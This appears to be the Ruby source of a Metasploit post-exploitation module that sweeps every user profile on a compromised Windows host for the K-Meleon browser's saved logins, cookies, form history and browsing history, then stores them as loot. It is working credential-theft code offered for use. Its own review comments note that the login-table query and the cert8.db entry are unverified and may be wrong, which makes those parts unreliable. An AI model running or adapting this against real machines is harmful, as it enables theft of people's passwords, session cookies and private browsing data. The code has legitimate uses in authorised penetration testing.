##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
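class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Artifact manifest handed to Msf::Post::Windows::Packrat#run_packrat for
  # each user profile. Every entry is located under the profile's AppData
  # directory (path:) inside the 'K-Meleon' folder (dir:). Entries whose
  # credential_type is 'sqlite' also carry the table/column pairs that are
  # exported from that database; the other entry is collected as a raw file.
  ARTIFACTS =
    {
      application: 'k-meleon',
      app_category: 'browsers',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'AppData',
          dir: 'K-Meleon',
          artifact_file_name: 'signons.sqlite',
          description: "K-Meleon's saved Username and Passwords",
          credential_type: 'sqlite',
          # NOTE(review): every other sqlite entry in this manifest targets
          # Mozilla-style moz_* tables, but this one names a 'logins' table
          # with 'username_value, action_url' columns. Confirm against a
          # real K-Meleon signons.sqlite before relying on this export.
          sql_search: [
            {
              sql_description: "Database Commands which exports K-Meleon's Login data",
              sql_table: 'logins',
              sql_column: 'username_value, action_url'
            }
          ]
        },
        {
          filetypes: 'logins',
          path: 'AppData',
          dir: 'K-Meleon',
          artifact_file_name: 'cert8.db',
          # NOTE(review): collected as an opaque file (no sql_search);
          # whether it actually holds saved credentials is not established
          # here — verify before treating its contents as logins.
          description: "K-Meleon's saved Username and Passwords",
          credential_type: 'database'
        },
        {
          filetypes: 'cookies',
          path: 'AppData',
          dir: 'K-Meleon',
          artifact_file_name: 'cookies.sqlite',
          description: "K-Meleon's Cookies",
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports K-Meleon's Cookies",
              sql_table: 'moz_cookies',
              sql_column: 'baseDomain, host, name, path, value'
            }
          ]
        },
        {
          filetypes: 'web_history',
          path: 'AppData',
          dir: 'K-Meleon',
          artifact_file_name: 'formhistory.sqlite',
          description: "K-Meleon's Visited websites ",
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports K-Meleon's Form history",
              sql_table: 'moz_formhistory',
              sql_column: 'value'
            }
          ]
        },
        {
          filetypes: 'web_history',
          path: 'AppData',
          dir: 'K-Meleon',
          artifact_file_name: 'places.sqlite',
          description: "K-Meleon's Visited websites ",
          credential_type: 'sqlite',
          sql_search: [
            {
              sql_description: "Database Commands which exports K-Meleon's Visited URLs",
              sql_table: 'moz_places',
              sql_column: 'url'
            },
            {
              sql_description: "Database Commands which exports K-Meleon's Input history",
              sql_table: 'moz_inputhistory',
              sql_column: 'input'
            },
            {
              sql_description: "Database Commands which exports K-Meleon's Visited hosts",
              sql_table: 'moz_hosts',
              sql_column: 'host'
            },
            {
              sql_description: "Database Commands which exports K-Meleon's Keywords",
              sql_table: 'moz_keywords',
              sql_column: 'keyword'
            }
          ]
        }
      ]
    }.freeze

  # Registers module metadata and the datastore options that control the sweep.
  #
  # @param info [Hash] metadata merged into the module description
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'K-Meleon Credential Gatherer',
        'Description' => %q{
          This module searches for K-Meleon credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # The selectable values are derived from the filetypes declared in
        # ARTIFACTS above (deduplicated), with 'All' prepended as the default.
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
      ]
    )
  end

  # Echoes the active option selections, then runs the Packrat sweep over
  # every user profile found on the host.
  #
  # @return [void]
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One Packrat pass per enumerated user profile; the ARTIFACTS manifest
    # tells the mixin what to look for under each profile.
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status 'PackRat credential sweep completed'
  end
end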